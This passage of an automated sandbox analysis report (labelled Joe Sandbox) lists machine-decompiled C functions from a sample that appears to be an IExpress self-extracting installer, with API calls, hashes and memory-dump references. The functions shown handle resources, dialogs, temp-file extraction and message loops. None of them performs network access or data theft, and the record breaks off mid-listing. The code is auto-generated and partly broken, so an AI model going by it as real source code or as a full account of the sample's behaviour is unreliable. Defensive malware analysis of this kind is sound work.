                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 209257c1f483a828c27c12e05e9ceac6f19a80822f48fe440d64bb436b2f19f9
                                                                                                                                                                                                        • Instruction ID: 121f4c1331ef5028e77f8d4c210b54685bbcd8012312a5724216ae126f2f3f96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209257c1f483a828c27c12e05e9ceac6f19a80822f48fe440d64bb436b2f19f9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C513671E0021DEBCB21CF98D884ABEBBB5FF48700F14412AEA05E3651DB359A41DBA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E001F4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E001F468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E001F468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E001F44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001F30B4), ref: 001F4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001F30B4), ref: 001F41E7
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: bc071664e24d3069417149a35dbac624dafbb3274c460a5dfa917a5b65680ca9
                                                                                                                                                                                                        • Instruction ID: 815b38447ee72249d8cb0eaab9e7210c660a14881de331337748843d5264f1da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc071664e24d3069417149a35dbac624dafbb3274c460a5dfa917a5b65680ca9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D01F4F130421C7FF32426665C96F7B218EDFE47A5F154025B709E2580DF68EC4181B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0x1f8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x1f8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0x1f8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 001F7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 001F719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 001F71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 001F71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 8d583c40051241b8816573c2f84b042f7f5cf03928d8233dd3e87b7d87823cb8
                                                                                                                                                                                                        • Instruction ID: 0657cbb5797b28c135ccbe45cfe5859373df0a5d072aabc01c1fdfd5fbbaac93
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d583c40051241b8816573c2f84b042f7f5cf03928d8233dd3e87b7d87823cb8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7112EB1D09208DFCB10DFB8DA48AAEBBF4FF48315FA14855E909E7250EB349A45CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E001F43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x1f9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 001F1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 001F1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 001F1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 0cd5309c8fd95873c21671bbd133441c1cc36329152824e97cbdc42fffc64c3c
                                                                                                                                                                                                        • Instruction ID: f5f79814c1cdd3429e76ee1d2a23bf484f8e6e3fe2d14ec3a53e76ab312749d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cd5309c8fd95873c21671bbd133441c1cc36329152824e97cbdc42fffc64c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3211CB7160019DABCB00EF68EE08ABE77B8EF09300F418150FA1A93590CB34AE91CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E001F63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E001F1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				E001F658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F63EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-1610346413
                                                                                                                                                                                                        • Opcode ID: 731829335fb5e36bd5d67e8b8a23ddd2a95113cacbf022b04f4d38cfc56126eb
                                                                                                                                                                                                        • Instruction ID: b28d3739574ffcaf7be9c37de62c872012f778f9c5a3c9d8671fd80b30805203
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 731829335fb5e36bd5d67e8b8a23ddd2a95113cacbf022b04f4d38cfc56126eb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521C3B1A0021CABD710EF25DC85FFA7368EB94314F1041A9B689A3180DBB46D85CF64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E001F1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0x1f91e0; // 0x27e8ea8
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0x1f91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					E001F44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        				E001F44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,001F4E6F), ref: 001F47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 001F4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 001F4847
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-1610346413
                                                                                                                                                                                                        • Opcode ID: a5edf22fe9964f165968b8150747bc5020b3dad0c83c35ab5e3edf09532e84c3
                                                                                                                                                                                                        • Instruction ID: 1fe8520dc984a31491a20f8f5c77d090e9b3ed458033bd463880ddc36489d9b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5edf22fe9964f165968b8150747bc5020b3dad0c83c35ab5e3edf09532e84c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 361155B8208601AFE7189F64AC18F733B5AEBC1350B088518FF86DB740DB398C02C660
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E001F6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0x1f9a3c; // 0x1f0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E001F44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t24 = _a16;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                                                                                        							_push(_a12);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                        						FreeResource(_t21);
                                                                                                                                                                                                        						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(001F0000,000007D6,00000005), ref: 001F652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(001F0000,00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001F6538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(001F0000,00000000,00000547,001F19E0,00000000), ref: 001F6557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,001F2EE8,00000000,001F19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001F6560
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1214682469-0
                                                                                                                                                                                                        • Opcode ID: 54bfed3e0fab59eb534e7ee91ea791b9fd606bce9a994c46e963156820c0da2f
                                                                                                                                                                                                        • Instruction ID: 3ac175f858538b8a494fa7da3c172d41d1b72658dd94d7117d6c2381acdbf8d2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 54bfed3e0fab59eb534e7ee91ea791b9fd606bce9a994c46e963156820c0da2f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A80149B210020DBBCB105F69AC48DBB7A6CEF853A0F050125FF04B3160DB76CC50C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001F369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36B2
